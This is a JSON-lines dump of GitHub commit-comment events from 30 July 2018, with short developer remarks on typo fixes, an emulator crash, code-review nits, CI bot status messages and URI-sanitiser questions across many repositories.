{"id":"8038974143","type":"CommitCommentEvent","actor":{"login":"AndrewNile"},"repo":{"name":"otya128/winevdm"},"payload":{"comment":{"id":29890431,"position":null,"line":null,"path":null,"commit_id":"17d82faecf9da56bd66c69d35d1fa3aeece84061","created_at":"2018-07-30T16:53:44Z","updated_at":"2018-07-30T16:53:44Z","author_association":"NONE","body":"Thank you so much! Problem is 100% fixed."}},"created_at":"2018-07-30T16:53:44Z"}
{"id":"8038975669","type":"CommitCommentEvent","actor":{"login":"twinaphex"},"repo":{"name":"libretro/reicast-emulator"},"payload":{"comment":{"id":29890436,"position":null,"line":null,"path":null,"commit_id":"b7a698654b26efa15ef82b3ea4c2c846fd99bc1b","created_at":"2018-07-30T16:54:03Z","updated_at":"2018-07-30T16:54:03Z","author_association":"MEMBER","body":"Yeah, it was not this change. It was the hack removal here -\r\n\r\nhttps://github.com/libretro/reicast-emulator/commit/9b4cbc4a4552316ccccd973633b05587064b3c0a\r\n\r\nOK, noted about the suggestions. I will improve it like that."}},"created_at":"2018-07-30T16:54:03Z"}
{"id":"8038979699","type":"CommitCommentEvent","actor":{"login":"dotlambda"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29890442,"position":null,"line":null,"path":null,"commit_id":"e00ddc62b2737304ade27d04da5a5d5751ae9ae6","created_at":"2018-07-30T16:54:49Z","updated_at":"2018-07-30T16:54:49Z","author_association":"MEMBER","body":"No, not to master but to python-unstable, for which there is a Hydra job."}},"created_at":"2018-07-30T16:54:49Z"}
{"id":"8038982028","type":"CommitCommentEvent","actor":{"login":"tomidelucca"},"repo":{"name":"mercadopago/px-ios"},"payload":{"comment":{"id":29890447,"position":5,"line":15,"path":"MercadoPagoSDK/MercadoPagoSDK/MercadoPagoUIViewController.swift","commit_id":"edee57aebe0fc54ce9710a8d3c8fd26a6d698ace","created_at":"2018-07-30T16:55:17Z","updated_at":"2018-07-30T16:55:17Z","author_association":"MEMBER","body":"dale. porque soy muy objc. ahi lo fixeo."}},"created_at":"2018-07-30T16:55:17Z"}
{"id":"8038982228","type":"CommitCommentEvent","actor":{"login":"scanner-darkly"},"repo":{"name":"monome/teletype"},"payload":{"comment":{"id":29890449,"position":null,"line":null,"path":null,"commit_id":"eb3976534db0df122628f3910673f5b052e8d8ad","created_at":"2018-07-30T16:55:19Z","updated_at":"2018-07-30T16:55:19Z","author_association":"MEMBER","body":"looks like libavr32 submodule wasn't updated, i just pushed a commit. can you try pulling the latest? it should build now (you'll need to update submodule)"}},"created_at":"2018-07-30T16:55:19Z"}
{"id":"8038982750","type":"CommitCommentEvent","actor":{"login":"FiriusFoxx"},"repo":{"name":"FiriusFoxx/JustOneApp"},"payload":{"comment":{"id":29890453,"position":null,"line":null,"path":null,"commit_id":"efae0f119fd1fb760c5c38b9a19124013c8afaa8","created_at":"2018-07-30T16:55:26Z","updated_at":"2018-07-30T16:55:26Z","author_association":"OWNER","body":"This commit was needed to allow an import"}},"created_at":"2018-07-30T16:55:26Z"}
{"id":"8038983881","type":"CommitCommentEvent","actor":{"login":"BohdanHamulets"},"repo":{"name":"openssl/openssl"},"payload":{"comment":{"id":29890454,"position":null,"line":null,"path":null,"commit_id":"2a5a01a47653fe7f9313b1ac375bd26d45e888a7","created_at":"2018-07-30T16:55:39Z","updated_at":"2018-07-30T16:55:39Z","author_association":"NONE","body":"s_time.pod line 115, typo 'Thss' instead of 'These'\r\nTanks a lot for such a quick fix."}},"created_at":"2018-07-30T16:55:39Z"}
{"id":"8038985845","type":"CommitCommentEvent","actor":{"login":"twinaphex"},"repo":{"name":"libretro/reicast-emulator"},"payload":{"comment":{"id":29890456,"position":null,"line":null,"path":null,"commit_id":"b7a698654b26efa15ef82b3ea4c2c846fd99bc1b","created_at":"2018-07-30T16:56:03Z","updated_at":"2018-07-30T16:56:03Z","author_association":"MEMBER","body":"@flyinghead \r\n\r\nActually, for whatever reason, I get a hard crash with this change applied on top of the current master -\r\n\r\nhttps://hastebin.com/evufufafey.diff\r\n\r\nIt crashes due to UpdateAeg(); for whatever reason. Really driving me nuts, since this does not happen until this commit here -\r\n\r\nhttps://github.com/libretro/reicast-emulator/commit/9b4cbc4a4552316ccccd973633b05587064b3c0av"}},"created_at":"2018-07-30T16:56:03Z"}
{"id":"8038989481","type":"CommitCommentEvent","actor":{"login":"OGFris"},"repo":{"name":"SpecterTeam/Pinger"},"payload":{"comment":{"id":29890463,"position":null,"line":null,"path":null,"commit_id":"e474884bcd55c5bcb037a88e4f1773cd75812982","created_at":"2018-07-30T16:56:45Z","updated_at":"2018-07-30T16:56:45Z","author_association":"MEMBER","body":"@SOF3 [Fixed](https://github.com/SpecterTeam/Pinger/commit/dd9519f2eac913c981b018e92c0ee166415009d0)"}},"created_at":"2018-07-30T16:56:45Z"}
{"id":"8038997966","type":"CommitCommentEvent","actor":{"login":"jwill2385"},"repo":{"name":"droid-squad/Natville"},"payload":{"comment":{"id":29890491,"position":null,"line":null,"path":null,"commit_id":"5cbb69321169344abb8811309da14d7fe337c757","created_at":"2018-07-30T16:58:23Z","updated_at":"2018-07-30T16:58:23Z","author_association":"CONTRIBUTOR","body":"Now when you click on details about a location from recommendations fragment, the back button will return you to recommendations fragment. Similarly, when  you click on details from the search fragment, the back button will return you to the search fragment."}},"created_at":"2018-07-30T16:58:23Z"}
{"id":"8038998653","type":"CommitCommentEvent","actor":{"login":"egucciar"},"repo":{"name":"semantic-release/semantic-release"},"payload":{"comment":{"id":29890493,"position":126,"line":126,"path":"index.js","commit_id":"b4440fe0d38ceb972bdda9ccb24aafb78e8b3cef","created_at":"2018-07-30T16:58:31Z","updated_at":"2018-07-30T16:58:31Z","author_association":"NONE","body":"Our team is considering leveraging this plugin https://github.com/semantic-release/npm#npm-configuration\r\n\r\nTo be able to release on other channels and using environment variables to change which tag to release to."}},"created_at":"2018-07-30T16:58:31Z"}
{"id":"8039000557","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29890501,"position":null,"line":null,"path":null,"commit_id":"ed0296ce9f0b5bdf4956c5b07a41890161956987","created_at":"2018-07-30T16:58:53Z","updated_at":"2018-07-30T16:58:53Z","author_association":"NONE","body":"158988131-Outdoor-air-node-wet-bulb-EMS-override (lgu1234) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1703 of 1703 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ed0296ce9f0b5bdf4956c5b07a41890161956987-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ed0296ce9f0b5bdf4956c5b07a41890161956987-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ed0296ce9f0b5bdf4956c5b07a41890161956987-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.08%25-green.png)</a>\n"}},"created_at":"2018-07-30T16:58:53Z"}
{"id":"8039003265","type":"CommitCommentEvent","actor":{"login":"hafiad2"},"repo":{"name":"telegramdesktop/tdesktop"},"payload":{"comment":{"id":29890506,"position":null,"line":null,"path":null,"commit_id":"f65e8824fb7d174c890ed0d28def39991e31bc46","created_at":"2018-07-30T16:59:25Z","updated_at":"2018-07-30T16:59:25Z","author_association":"NONE","body":"Good"}},"created_at":"2018-07-30T16:59:25Z"}
{"id":"8039003480","type":"CommitCommentEvent","actor":{"login":"twinaphex"},"repo":{"name":"libretro/reicast-emulator"},"payload":{"comment":{"id":29890510,"position":null,"line":null,"path":null,"commit_id":"b7a698654b26efa15ef82b3ea4c2c846fd99bc1b","created_at":"2018-07-30T16:59:27Z","updated_at":"2018-07-30T16:59:27Z","author_association":"MEMBER","body":"Yeah, for reasons completely unknown yet, if I just revert this commit then it works again -\r\n\r\nhttps://github.com/libretro/reicast-emulator/commit/9b4cbc4a4552316ccccd973633b05587064b3c0av\r\n\r\nugh. Guess I will need to be more careful."}},"created_at":"2018-07-30T16:59:27Z"}
{"id":"8039004316","type":"CommitCommentEvent","actor":{"login":"marcelofrate"},"repo":{"name":"OrchFlow/orchflow.github.io"},"payload":{"comment":{"id":29890512,"position":null,"line":null,"path":null,"commit_id":"035930ff357424eadef2f9091ecf16ba4ad0142b","created_at":"2018-07-30T16:59:37Z","updated_at":"2018-07-30T16:59:37Z","author_association":"NONE","body":"Atualização do título"}},"created_at":"2018-07-30T16:59:37Z"}
{"id":"8039004727","type":"CommitCommentEvent","actor":{"login":"paxtonhare"},"repo":{"name":"marklogic-community/smart-mastering-core"},"payload":{"comment":{"id":29890514,"position":null,"line":null,"path":null,"commit_id":"4b9430ea345d62c901b7060c6e5944d13a773bdb","created_at":"2018-07-30T16:59:41Z","updated_at":"2018-07-30T16:59:41Z","author_association":"CONTRIBUTOR","body":"```\r\n<algorithms>\r\n    <algorithm name=\"name\" function=\"name\"/>\r\n    <!-- config for standard algorithm -->\r\n    <std-algorithm xmlns:ns1=\"blah\" xmlns:ns2=\"blah2\">\r\n      <timestamp path=\"\" />\r\n    </std-algorithm>\r\n  </algorithms>\r\n```"}},"created_at":"2018-07-30T16:59:41Z"}
{"id":"8039007857","type":"CommitCommentEvent","actor":{"login":"guilhermesilveira"},"repo":{"name":"GuilhermeMatheus/alura-csharp-pt9"},"payload":{"comment":{"id":29890527,"position":17,"line":17,"path":"CSharpPT9/1_FileStreamEEncoding.cs","commit_id":"fb0c9ef8e246c0eb15ff2d274a10df4181e832e3","created_at":"2018-07-30T17:00:18Z","updated_at":"2018-07-30T17:00:18Z","author_association":"NONE","body":"perfeito"}},"created_at":"2018-07-30T17:00:18Z"}
{"id":"8039009333","type":"CommitCommentEvent","actor":{"login":"AmelieVRL"},"repo":{"name":"CDSP-SCPO/site-DIME-SHS"},"payload":{"comment":{"id":29890530,"position":null,"line":null,"path":null,"commit_id":"8487820acdf7d34d62332d06ad1cd096a02a18ce","created_at":"2018-07-30T17:00:32Z","updated_at":"2018-07-30T17:00:32Z","author_association":"COLLABORATOR","body":"Merci @boogheta "}},"created_at":"2018-07-30T17:00:32Z"}
{"id":"8039010347","type":"CommitCommentEvent","actor":{"login":"twinaphex"},"repo":{"name":"libretro/reicast-emulator"},"payload":{"comment":{"id":29890534,"position":null,"line":null,"path":null,"commit_id":"b7a698654b26efa15ef82b3ea4c2c846fd99bc1b","created_at":"2018-07-30T17:00:44Z","updated_at":"2018-07-30T17:00:44Z","author_association":"MEMBER","body":"As soon as I add the UpdateAEG() step again I get the crash again."}},"created_at":"2018-07-30T17:00:44Z"}
{"id":"8039011839","type":"CommitCommentEvent","actor":{"login":"guilhermesilveira"},"repo":{"name":"GuilhermeMatheus/alura-csharp-pt9"},"payload":{"comment":{"id":29890538,"position":31,"line":31,"path":"CSharpPT9/7_Serializacao.cs","commit_id":"fb0c9ef8e246c0eb15ff2d274a10df4181e832e3","created_at":"2018-07-30T17:01:01Z","updated_at":"2018-07-30T17:01:01Z","author_association":"NONE","body":"Se XML ainda é algo razoavelmente usado no mundo C# é um curso legal para termos depois (json/outros idem)"}},"created_at":"2018-07-30T17:01:01Z"}
{"id":"8039013383","type":"CommitCommentEvent","actor":{"login":"christian-esken"},"repo":{"name":"christian-esken/rocksdb"},"payload":{"comment":{"id":29890542,"position":89,"line":89,"path":"java/rocksjni/compact_range_options.cc","commit_id":"ddc0e94fe1ef589a4afdd5b0ba8e150e6e32dbd2","created_at":"2018-07-30T17:01:20Z","updated_at":"2018-07-30T17:01:20Z","author_association":"OWNER","body":"How did this lint-ignore stay/get back here. Should be removed (again)."}},"created_at":"2018-07-30T17:01:20Z"}
{"id":"8039018791","type":"CommitCommentEvent","actor":{"login":"christian-esken"},"repo":{"name":"christian-esken/rocksdb"},"payload":{"comment":{"id":29890557,"position":25,"line":1994,"path":"java/rocksjni/rocksjni.cc","commit_id":"ddc0e94fe1ef589a4afdd5b0ba8e150e6e32dbd2","created_at":"2018-07-30T17:02:26Z","updated_at":"2018-07-30T17:02:26Z","author_association":"OWNER","body":"This is the original rocksdb_compactrange_helper(). I unified it with the new CompactRangeOptions& based one."}},"created_at":"2018-07-30T17:02:26Z"}
{"id":"8039021197","type":"CommitCommentEvent","actor":{"login":"sQu1rr"},"repo":{"name":"DrKLO/Telegram"},"payload":{"comment":{"id":29890569,"position":null,"line":null,"path":null,"commit_id":"d073b80063c568f31d81cc88c927b47c01a1dbf4","created_at":"2018-07-30T17:02:53Z","updated_at":"2018-07-30T17:02:53Z","author_association":"NONE","body":"does anyone else have a problem with linking the ffmpeg libavutil.a? undefined reference to  'posix_memalign'  - any way to recompile the libs? or maybe someone knows how to fix it?"}},"created_at":"2018-07-30T17:02:53Z"}
{"id":"8039024424","type":"CommitCommentEvent","actor":{"login":"richsalz"},"repo":{"name":"openssl/openssl"},"payload":{"comment":{"id":29890585,"position":null,"line":null,"path":null,"commit_id":"2a5a01a47653fe7f9313b1ac375bd26d45e888a7","created_at":"2018-07-30T17:03:34Z","updated_at":"2018-07-30T17:03:34Z","author_association":"CONTRIBUTOR","body":"There were two typo’s on that line. :(  Updated commit pushed, thanks!\r\n"}},"created_at":"2018-07-30T17:03:34Z"}
{"id":"8039026118","type":"CommitCommentEvent","actor":{"login":"ubcbot"},"repo":{"name":"classytest/PostTestDoNotDelete"},"payload":{"comment":{"id":29890592,"position":null,"line":null,"path":null,"commit_id":"c35a0e5968338a9757813b58368f36ddd64b063e","created_at":"2018-07-30T17:03:56Z","updated_at":"2018-07-30T17:03:56Z","author_association":"NONE","body":"Automated Test Suite Message"}},"created_at":"2018-07-30T17:03:56Z"}
{"id":"8039028248","type":"CommitCommentEvent","actor":{"login":"apalalayek"},"repo":{"name":"apalalayek/udacity_projects"},"payload":{"comment":{"id":29890598,"position":3,"line":2,"path":"README.md","commit_id":"382f5fbf235db8558ced80acc3bf5cfacaafb5da","created_at":"2018-07-30T17:04:23Z","updated_at":"2018-07-30T17:04:23Z","author_association":"OWNER","body":"Added first comment"}},"created_at":"2018-07-30T17:04:23Z"}
{"id":"8039028348","type":"CommitCommentEvent","actor":{"login":"discoursebot"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29890599,"position":null,"line":null,"path":null,"commit_id":"2c90a2e5c25a0ee5090bb0d03e21e1bf3fc0c91c","created_at":"2018-07-30T17:04:24Z","updated_at":"2018-07-30T17:04:24Z","author_association":"NONE","body":"This commit has been mentioned on **Discourse Meta**. There might be relevant details there:\n\nhttps://meta.discourse.org/t/new-topic-composer-tag-box-stealing-focus-from-category-dropdown/93438/4\n"}},"created_at":"2018-07-30T17:04:24Z"}
{"id":"8039029633","type":"CommitCommentEvent","actor":{"login":"khardenstine"},"repo":{"name":"hyperfiddle/hyperfiddle"},"payload":{"comment":{"id":29890602,"position":6,"line":209,"path":"src/hyperfiddle/ui.cljs","commit_id":"1b9ee59bf07fe50e9ef23de393a3c04e45ae5830","created_at":"2018-07-30T17:04:37Z","updated_at":"2018-07-30T17:04:37Z","author_association":"MEMBER","body":"The original argument list was probably to simplify the partial.  Reordering doesn't mean we should get rid of the partial too.  The following sucks but its stable (unlike an anonymous function):\r\n```clj\r\n(letfn [(adapter-partialing-sucks [sort-fn sort-col relations-val] \r\n          (sort-fn relations-val sort-col)]\r\n  ...\r\n  (r/fmap (r/partial adapter-partialing-sucks sort-fn sort-col))\r\n  ...\r\n  )\r\n```"}},"created_at":"2018-07-30T17:04:37Z"}
{"id":"8039040163","type":"CommitCommentEvent","actor":{"login":"ArminTaheri"},"repo":{"name":"DianaSerra/series-data-prototype"},"payload":{"comment":{"id":29890628,"position":43,"line":43,"path":"src/series/components/BatchImport.js","commit_id":"33b28c86be7bf7a8378761ed8e2d285bd85b22d2","created_at":"2018-07-30T17:06:42Z","updated_at":"2018-07-30T17:06:42Z","author_association":"NONE","body":"After using the input trick it might be best to make this an empty array as it's hard to create fake files.\r\n\r\nyou can use `File::name`  https://developer.mozilla.org/en-US/docs/Web/API/File/name to get the actual filename to render in the list."}},"created_at":"2018-07-30T17:06:42Z"}
{"id":"8039042363","type":"CommitCommentEvent","actor":{"login":"Pedro558"},"repo":{"name":"Pedro558/Repo_Test"},"payload":{"comment":{"id":29890631,"position":null,"line":null,"path":null,"commit_id":"81671ca9bebe2c1cc0cbeed0107d22bf194a139a","created_at":"2018-07-30T17:07:08Z","updated_at":"2018-07-30T17:07:08Z","author_association":"OWNER","body":"Se liga aqui **menor** nesse _código_ bolado na moral mrm `<h1 class = \"titulo\">` vai lá no meu site [www.rogerin157.com](url) \r\n\r\n- dasdasdas\r\n\r\n- asdasdasfas\r\n\r\n- gdfjrhgfafgfhdffsfdgfd"}},"created_at":"2018-07-30T17:07:08Z"}
{"id":"8039044287","type":"CommitCommentEvent","actor":{"login":"flyinghead"},"repo":{"name":"libretro/reicast-emulator"},"payload":{"comment":{"id":29890638,"position":null,"line":null,"path":null,"commit_id":"b7a698654b26efa15ef82b3ea4c2c846fd99bc1b","created_at":"2018-07-30T17:07:31Z","updated_at":"2018-07-30T17:07:31Z","author_association":"NONE","body":"I didn't spot anything wrong in this commit or others.\r\nAny idea what makes it crash in UpdateAEG()?\r\nThis method just access the Aica registers and some static tables initialized at startup."}},"created_at":"2018-07-30T17:07:31Z"}
{"id":"8039049166","type":"CommitCommentEvent","actor":{"login":"wolfenste"},"repo":{"name":"wolfenste/tictactoe"},"payload":{"comment":{"id":29890661,"position":5,"line":28,"path":"tests/TicTacToeTest.php","commit_id":"cbdb6846766137c371be845c5e499a8c786f710e","created_at":"2018-07-30T17:08:31Z","updated_at":"2018-07-30T17:08:31Z","author_association":"OWNER","body":"I see. I tried to avoid returning mixed values. Keeping consistency with '' through program too."}},"created_at":"2018-07-30T17:08:31Z"}
{"id":"8039050207","type":"CommitCommentEvent","actor":{"login":"twinaphex"},"repo":{"name":"libretro/reicast-emulator"},"payload":{"comment":{"id":29890666,"position":null,"line":null,"path":null,"commit_id":"b7a698654b26efa15ef82b3ea4c2c846fd99bc1b","created_at":"2018-07-30T17:08:43Z","updated_at":"2018-07-30T17:08:43Z","author_association":"MEMBER","body":"It only crashes with Reicast OIT. Reicast non-OIT seems fine.\r\n\r\nWhen the crash happens I see the following log messages -\r\n\r\n[libretro INFO] Using Recompiler\r\nSh4 Reset\r\nrecSh4 Init\r\nFreeing fpcb\r\n[GPF]Unhandled access to : 0xFFFFFFFF\r\nSegmentation fault"}},"created_at":"2018-07-30T17:08:43Z"}
{"id":"8039053110","type":"CommitCommentEvent","actor":{"login":"addy-dclxvi"},"repo":{"name":"addy-dclxvi/i3-starterpack"},"payload":{"comment":{"id":29890674,"position":null,"line":null,"path":null,"commit_id":"53e50f30d370ce2bd034c318746fdd81155273b2","created_at":"2018-07-30T17:09:20Z","updated_at":"2018-07-30T17:09:20Z","author_association":"OWNER","body":"Also edit the ALSA volume up and down command"}},"created_at":"2018-07-30T17:09:20Z"}
{"id":"8039056246","type":"CommitCommentEvent","actor":{"login":"gBringout"},"repo":{"name":"gBringout/SphericalHarmonics"},"payload":{"comment":{"id":29890679,"position":null,"line":null,"path":null,"commit_id":"a4c9e4491d7491d2fed2a983f757a1e84ebc396c","created_at":"2018-07-30T17:09:56Z","updated_at":"2018-07-30T17:09:56Z","author_association":"OWNER","body":"Hi,\r\nBoth the Schmidt and normal normalization work (see the test function Test.m). Could you please expand your comments? I agree that the scaling factor is not always integrated to this factor this way, but for my implementation, I found this way to be simpler.\r\n\r\nFor your additional question, you will have to grab some (large) pieces of paper and make the calculation yourself. I wasn't able to found my calculation.\r\n\r\nGael"}},"created_at":"2018-07-30T17:09:56Z"}
{"id":"8039057172","type":"CommitCommentEvent","actor":{"login":"c2rosa"},"repo":{"name":"skjolber/3d-bin-container-packing"},"payload":{"comment":{"id":29890681,"position":null,"line":null,"path":null,"commit_id":"6765f38d9036f715b7d418ec492520b51c28849f","created_at":"2018-07-30T17:10:06Z","updated_at":"2018-07-30T17:10:06Z","author_association":"NONE","body":"I am confused by the entry in Packager.java and the method: \r\npublic Container pack(List<BoxItem> boxes, List<Dimension> dimensions, long deadline) \r\n\r\nOn line 119 there is an entry:\r\nif(!binarySearch || dimensions.size() <= 2 || deadline == Long.MAX_VALUE) {\r\n...\r\n} else {\r\n....\r\n}\r\n\r\nIt appears that it never will call the binarySearch if we are fitting the boxes into a List of dimensions of size less than or equal to 2.\r\n\r\nThis is puzzling to me?\r\n\r\nThe List<Dimension> dimensions contains the a list of The Dimensions of the cube shaped volumes I'm trying to load my boxes into.\r\nI only put one such cube shaped volume in....so I am only trying to load the boxes into that one cube shaped volume.\r\nAs such, it appears it will NEVER use the binary search.\r\nWhy?  This seems odd to me.  What am I not understanding?"}},"created_at":"2018-07-30T17:10:06Z"}
{"id":"8039057961","type":"CommitCommentEvent","actor":{"login":"dustingetz"},"repo":{"name":"hyperfiddle/hyperfiddle"},"payload":{"comment":{"id":29890684,"position":6,"line":209,"path":"src/hyperfiddle/ui.cljs","commit_id":"1b9ee59bf07fe50e9ef23de393a3c04e45ae5830","created_at":"2018-07-30T17:10:16Z","updated_at":"2018-07-30T17:10:16Z","author_association":"MEMBER","body":"Mine is as stable as the atom, its in let over lambda"}},"created_at":"2018-07-30T17:10:16Z"}
{"id":"8039058008","type":"CommitCommentEvent","actor":{"login":"richfitz"},"repo":{"name":"ropensci/jsonvalidate"},"payload":{"comment":{"id":29890685,"position":null,"line":null,"path":null,"commit_id":"d831da511f7de69383948981ac6156c110865ce9","created_at":"2018-07-30T17:10:16Z","updated_at":"2018-07-30T17:10:16Z","author_association":"MEMBER","body":"I've cherry picked your commit in as 11e884f37e98f8a3dc158d946f51d993a5004688! so it should show up properly with attribution and I believe close this PR when the branch is merged"}},"created_at":"2018-07-30T17:10:16Z"}
{"id":"8039061492","type":"CommitCommentEvent","actor":{"login":"gBringout"},"repo":{"name":"gBringout/SphericalHarmonics"},"payload":{"comment":{"id":29890691,"position":null,"line":null,"path":null,"commit_id":"138bffb3a8de0e63169a6502f04a0dcc113f46ce","created_at":"2018-07-30T17:10:57Z","updated_at":"2018-07-30T17:10:57Z","author_association":"OWNER","body":"Hello,\r\n\r\nSee [](https://github.com/gBringout/SphericalHarmonics/commit/a4c9e4491d7491d2fed2a983f757a1e84ebc396c#commitcomment-29890679)"}},"created_at":"2018-07-30T17:10:57Z"}
{"id":"8039070901","type":"CommitCommentEvent","actor":{"login":"getdls"},"repo":{"name":"slashiee/cemu_graphic_packs"},"payload":{"comment":{"id":29890713,"position":null,"line":null,"path":null,"commit_id":"259a9e6289a4a18b916c7b1f0ec2b6fa94f7b9c5","created_at":"2018-07-30T17:12:45Z","updated_at":"2018-07-30T17:12:45Z","author_association":"COLLABORATOR","body":"Build validated OK. Pre / post screenshot \r\n<img width=\"1813\" alt=\"tmsshadows\" src=\"https://user-images.githubusercontent.com/25286924/43412109-7abe0bb6-942c-11e8-9f41-9934d2ac996e.png\">\r\n\r\n"}},"created_at":"2018-07-30T17:12:45Z"}
{"id":"8039071607","type":"CommitCommentEvent","actor":{"login":"kaushal2905"},"repo":{"name":"kaushal2905/data-structure-practical"},"payload":{"comment":{"id":29890720,"position":null,"line":null,"path":null,"commit_id":"a5d465db64039b5a15519b9eab8b74be379e6174","created_at":"2018-07-30T17:12:53Z","updated_at":"2018-07-30T17:12:53Z","author_association":"OWNER","body":"stack program in c and c++"}},"created_at":"2018-07-30T17:12:53Z"}
{"id":"8039073979","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"double-beep/Stockfish"},"payload":{"comment":{"id":29890724,"position":null,"line":null,"path":null,"commit_id":"420be0aa063e40a203ef848947b1c6560160b6de","created_at":"2018-07-30T17:13:21Z","updated_at":"2018-07-30T17:13:21Z","author_association":"NONE","body":"That is speculative LTC without a passed STC. In this cases reduce throughput accordingly to lower the bandwidth use. I set it to 166 (=1000/6)"}},"created_at":"2018-07-30T17:13:21Z"}
{"id":"8039076624","type":"CommitCommentEvent","actor":{"login":"ldallolio-irt"},"repo":{"name":"Alneos/vega"},"payload":{"comment":{"id":29890731,"position":null,"line":null,"path":null,"commit_id":"836983f95aa9be7a527f5bee5de5309cb57ac1ec","created_at":"2018-07-30T17:14:06Z","updated_at":"2018-07-30T17:14:06Z","author_association":"MEMBER","body":"You indeed found two problems:\r\n- unused-variable missing from CmakeList.txt, added it (back?)\r\n- wrong vector referenced in algorithm (when computing nodal force equivalent to pressure, see PLOAD1)\r\n\r\nThis is why I love warnings ;)\r\nFixed both in 5eb6bd45c4260bd45adf544f7b497582f9e4c84e but cannot push on gitlab anymore (rights problem), so pushing only to github for the moment\r\n"}},"created_at":"2018-07-30T17:14:06Z"}
{"id":"8039077044","type":"CommitCommentEvent","actor":{"login":"khardenstine"},"repo":{"name":"hyperfiddle/hyperfiddle"},"payload":{"comment":{"id":29890732,"position":6,"line":209,"path":"src/hyperfiddle/ui.cljs","commit_id":"1b9ee59bf07fe50e9ef23de393a3c04e45ae5830","created_at":"2018-07-30T17:14:11Z","updated_at":"2018-07-30T17:14:11Z","author_association":"MEMBER","body":"Ah right, I was thinking you could do better than the atom, but it doesn't matter if its the atom is the argument to the partial."}},"created_at":"2018-07-30T17:14:11Z"}
{"id":"8039080700","type":"CommitCommentEvent","actor":{"login":"htrob"},"repo":{"name":"tootsuite/mastodon"},"payload":{"comment":{"id":29890749,"position":null,"line":null,"path":null,"commit_id":"5b58cc67cd984b211ff68a7dbff5d8bc29bbb2d3","created_at":"2018-07-30T17:15:23Z","updated_at":"2018-07-30T17:15:23Z","author_association":"NONE","body":"Question: Does the sanitiser recognise the appropriate URI scheme corresponding to each of the protocols?  I'm assuming that it doesn't, so I'm wondering what work would be needed to make sure that the addresses following the protocol prefix are actually valid addresses for the specified protocol. \r\n\r\nFor example, if I were to add the magnet: protocol specifier, which follows a different URI scheme it wouldn't be enough to validate the protocol and the rest of the sanitisation of such URI would fail if you use a typical uri validator since it wouldn't contain a hostname. \r\nhttps://en.wikipedia.org/wiki/Magnet_URI_scheme\r\n\r\nPlease correct me if I'm wrong, but I was thinking a little deeper on this, as we we begin to move beyond the traditional resource addressing schemes.\r\n\r\nThe same happens for DAT or IPFS addresses that don't use a hostname.\r\n \r\nIn the case of Secure Scuttlebutt, it has different object types, which are differentiated by a single special character prefix ( See: https://github.com/ssbc/secure-scuttlebutt#object-ids )\r\n\r\nIn the case of DAT links, the address following the protocol is an ED25519 signature \r\n( See: https://ed25519.cr.yp.to/ and https://docs.datproject.org/concepts )\r\n\r\nIn the case of IPFS there are two versions of addresses, based on CIDv0 and CIDv1 which contain different multihash encoding schemes. At this time CIDv1 is rarely seen out in the wild, but it's going to be the default in future versions.\r\n( See: https://github.com/multiformats/multihash and https://github.com/ipld/cid#versions )\r\n\r\nActual sanitisation would imply having to add extra checks to make sure these are actually valid addresses for those protocols.\r\n"}},"created_at":"2018-07-30T17:15:23Z"}
{"id":"8039084714","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/wvuonline"},"payload":{"comment":{"id":29890787,"position":null,"line":null,"path":null,"commit_id":"95d14ad54fa14eaf3dc700ba6f461652bd26f435","created_at":"2018-07-30T17:17:42Z","updated_at":"2018-07-30T17:17:42Z","author_association":"COLLABORATOR","body":"Created multidev environment [wvuonline#ci-455](https://dashboard.pantheon.io/sites/8fb52aa5-5525-4d73-9b84-f2d86faf1da2#ci-455).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-455-wvuonline.pantheonsite.io/)"}},"created_at":"2018-07-30T17:17:42Z"}
{"id":"8039087655","type":"CommitCommentEvent","actor":{"login":"cssjoe"},"repo":{"name":"BoldGrid/boldgrid-backup"},"payload":{"comment":{"id":29890791,"position":70,"line":70,"path":"admin/class-boldgrid-backup-admin-cron-test.php","commit_id":"88323b06530798bf52a17e048b237406386c545d","created_at":"2018-07-30T17:18:20Z","updated_at":"2018-07-30T17:18:20Z","author_association":"MEMBER","body":"You used a suffix of \"_path\" for the first class property, but did not for the next two.  \"cron_config\" sounds like a config array.  \"cron_result\" sounds like a result set, and not a path to a file.\r\nAlso. the use of trailingslashit() is mainly for when you are not sure of the string already has a trailing slash or not, but need one.  BOLDGRID_BACKUP_PATH is defined without a trailing slash, so one can simply be added in the string."}},"created_at":"2018-07-30T17:18:20Z"}
{"id":"8039103378","type":"CommitCommentEvent","actor":{"login":"DatNoHand"},"repo":{"name":"DatNoHand/rpi-led-node"},"payload":{"comment":{"id":29890803,"position":null,"line":null,"path":null,"commit_id":"9873f0c22af9ea79c3012a647a5a10ac030dcdf5","created_at":"2018-07-30T17:19:50Z","updated_at":"2018-07-30T17:19:50Z","author_association":"OWNER","body":"kannsch ne da colorpicker usm bild toa, und denna zoagts ean bei longpress oder bei dblclick wirds denn azoagt"}},"created_at":"2018-07-30T17:19:50Z"}
